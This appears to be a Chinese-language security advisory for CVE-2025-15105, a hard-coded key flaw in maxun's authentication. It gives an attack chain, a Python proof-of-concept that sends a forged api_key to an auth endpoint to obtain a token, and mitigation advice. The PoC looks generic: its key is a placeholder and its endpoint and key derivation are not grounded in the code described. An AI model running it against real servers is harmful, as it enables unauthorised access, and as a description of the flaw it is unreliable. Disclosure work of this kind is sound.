CVE-2025-15105 getmaxun maxun 硬编码加密密钥漏洞

漏洞信息

漏洞编号

CVE-2025-15105

漏洞类型

硬编码加密密钥

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

getmaxun maxun

漏洞概述

CVE-2025-15105是getmaxun maxun项目中发现的安全漏洞，该漏洞存在于认证模块中。攻击者可以通过操纵api_key参数，利用代码中硬编码的加密密钥进行未授权访问。由于硬编码密钥被嵌入到源代码中，攻击者可以轻易获取并利用该密钥进行恶意操作。此漏洞影响maxun 0.0.28及之前的所有版本，攻击复杂度较高但仍可被利用。攻击者无需认证即可发起攻击，但需要一定的技术能力来构造有效的请求。该漏洞已被公开披露，厂商在收到通知后未作出任何回应，用户需自行采取防护措施。

技术细节

该漏洞位于getmaxun项目的server/src/routes/auth.ts文件中。问题出在处理api_key参数时，代码使用了硬编码的加密密钥进行认证验证。硬编码密钥使得所有安装此软件的实例使用相同的加密密钥，攻击者可以通过分析源代码或逆向工程获取该密钥。获取密钥后，攻击者可以构造带有伪造api_key的请求，绕过正常的认证流程。由于攻击需要理解系统架构和构造特定格式的请求，CVSS评分将其列为高复杂度攻击。漏洞利用可能导致敏感信息泄露，因为攻击者可以冒充合法用户身份进行操作。

攻击链分析

STEP 1

步骤1

收集情报：攻击者访问GitHub仓库或源码分析，获取硬编码的加密密钥

STEP 2

步骤2

定位目标：识别运行getmaxun maxun 0.0.28或更早版本的服务

STEP 3

步骤3

构造请求：使用提取的硬编码密钥构造带有伪造api_key的认证请求

STEP 4

步骤4

绕过认证：向/auth或相关认证端点发送构造的请求，利用硬编码密钥通过验证

STEP 5

步骤5

获取访问令牌：成功认证后获取有效的会话令牌或API访问权限

STEP 6

步骤6

未授权操作：使用获取的访问权限执行敏感操作或窃取数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import hashlib
import json

# CVE-2025-15105 PoC - Hard-coded Cryptographic Key Exploitation
# Target: getmaxun maxun <= 0.0.28

# Hard-coded key extracted from source code
HARDCODED_KEY = "your-extracted-key-here"

def exploit_cve_2025_15105(target_url):
    """
    Exploit for CVE-2025-15105: Use of Hard-coded Cryptographic Key
    
    This PoC demonstrates how an attacker can exploit the hard-coded
    cryptographic key to gain unauthorized access to the maxun API.
    
    Steps:
    1. Extract the hard-coded key from source code
    2. Construct a request with the hard-coded key
    3. Bypass authentication checks
    """
    
    # Construct malicious api_key using hard-coded key
    malicious_api_key = generate_api_key(HARDCODED_KEY)
    
    # Send request to auth endpoint
    endpoint = f"{target_url}/api/auth/verify"
    headers = {
        "Content-Type": "application/json",
        "X-Api-Key": malicious_api_key
    }
    
    payload = {
        "api_key": malicious_api_key,
        "action": "authenticate"
    }
    
    try:
        response = requests.post(endpoint, json=payload, headers=headers)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text}")
        
        if response.status_code == 200:
            token = response.json().get("token")
            print(f"[+] Successfully bypassed auth with token: {token}")
            return token
    except Exception as e:
        print(f"[-] Error: {e}")
    
    return None

def generate_api_key(key):
    """Generate API key using the hard-coded cryptographic key"""
    return hashlib.sha256(key.encode()).hexdigest()

if __name__ == "__main__":
    target = "http://target-server:3000"
    exploit_cve_2025_15105(target)

影响范围

getmaxun maxun <= 0.0.28

防御指南

临时缓解措施

由于厂商未回应，无法获得官方修复补丁。建议立即检查是否使用受影响版本，实施网络隔离限制对认证端点的访问，监控异常认证行为，考虑使用WAF规则阻止可疑请求，并在生产环境中移除所有硬编码的敏感信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15105
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15105
3 Details https://www.cvedetails.com/cve/CVE-2025-15105/
4 VulDB https://vuldb.com/cve/CVE-2025-15105
5 Link https://gist.github.com/H2u8s/40be31987e52fc81076b6bfcfbdf3cd6
6 Link https://vuldb.com/?ctiid.338476
7 Link https://vuldb.com/?id.338476
8 Link https://vuldb.com/?submit.710256